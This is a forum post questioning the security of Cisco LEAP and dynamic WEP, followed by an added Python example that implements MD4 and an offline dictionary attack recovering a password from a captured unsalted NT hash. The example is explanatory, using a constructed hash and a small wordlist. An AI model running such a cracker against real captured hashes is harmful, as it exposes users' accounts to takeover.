I have implemented a Cisco wireless LAN with Cisco Aironet 350 Series APs and radio cards. We were concerned about the issues with static WEP and have implemented a Cisco Secure ACS RADIUS server to provide dynamic WEP (LEAP enabled on the clients). This RADIUS server authenticates users by comparing their login credentials against an NT user group set up for wireless users. If the user is in the wireless group, the RADIUS server will authenticate them and give them access to the wireless network. This is Cisco's preferred method of dealing with the security issues of static WEP.
Now for some questions:
When sniffing the traffic during the wireless authentication, I notice that the user name and NT domain information are in the clear. Assuming that someone is sniffing this traffic, the only additional thing they will need is the user's password, and they could potentially get access to the WLAN. How is the NT password encrypted when it is sent to the authenticating RADIUS (Cisco ACS) server?

Also, if someone captures enough data through the day from one user's session, what's to prevent them from brute-forcing the WEP key with the various tools that are now available to do this (http://airsnort.sourceforge.net/)? If they captured enough traffic and derived the dynamic WEP key, they could then parse through all the captured data unencrypted, as they now have the dynamic, session-based WEP key. With that, if the user logged into any other NT servers etc. during their session, isn't it conceivable that the hacker will now have the user's NT password hash? Once they have that and brute-force it, they will have all the information they need to LEAP-authenticate. So LEAP is only as safe as the NT user ID and password?
Anyone have any thoughts on this?
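Added example, not part of the original post or of any Cisco code: the last step of the attack chain the poster describes, recovering the user's password from a captured NT hash, written as an offline dictionary attack. It assumes the attacker already holds the hash, exactly as the post supposes; the "captured" hash value and the wordlist are constructed for the example, and MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable on modern OpenSSL builds.

```python
import struct

MASK = 0xFFFFFFFF

# Message-word order for MD4 rounds 2 and 3 (RFC 1320); round 1 uses 0..15 in order.
_K2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_K3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
# Per-round left-rotation amounts, cycling every four steps.
_S = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Used here only because hashlib's md4 is
    often disabled in current OpenSSL builds; it is not optimised."""
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        v = [a, b, c, d]
        for i in range(48):
            rnd, j = divmod(i, 16)
            t = (-i) % 4  # index of the state word updated at this step (a, d, c, b, ...)
            x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
            if rnd == 0:
                fn, k, add = (x & y) | (~x & z), j, 0
            elif rnd == 1:
                fn, k, add = (x & y) | (x & z) | (y & z), _K2[j], 0x5A827999
            else:
                fn, k, add = x ^ y ^ z, _K3[j], 0x6ED9EBA1
            v[t] = _rotl((v[t] + (fn & MASK) + X[k] + add) & MASK, _S[rnd][j % 4])
        a, b, c, d = [(s + w) & MASK for s, w in zip((a, b, c, d), v)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password. No salt, no
    iteration, so one guess costs exactly one MD4."""
    return md4(password.encode("utf-16le")).hex()


def crack_nt_hash(target_hex: str, candidates):
    """Offline dictionary attack against one captured NT hash. Because the
    hash is unsalted, the same candidate list serves every user's hash."""
    target_hex = target_hex.lower()
    for guess in candidates:
        if nt_hash(guess) == target_hex:
            return guess
    return None


# Constructed scenario: the NT hash the attacker is assumed to have recovered
# from the decrypted session. It is the hash of a deliberately weak password.
CAPTURED_HASH = "8846f7eaee8fb117ad06bdd830b7586c"

# Constructed wordlist; a real attack uses large leaked-password lists plus
# site-specific mangling rules.
WORDLIST = ["wireless", "cisco", "aironet350", "Password1", "password", "letmein"]

if __name__ == "__main__":
    print("recovered password:", crack_nt_hash(CAPTURED_HASH, WORDLIST))
```

The point the code makes is the one the post arrives at: once the hash is in hand, nothing in the protocol slows the attacker down, so the strength of the NT password is the only remaining defence, and a password that appears in any wordlist falls immediately.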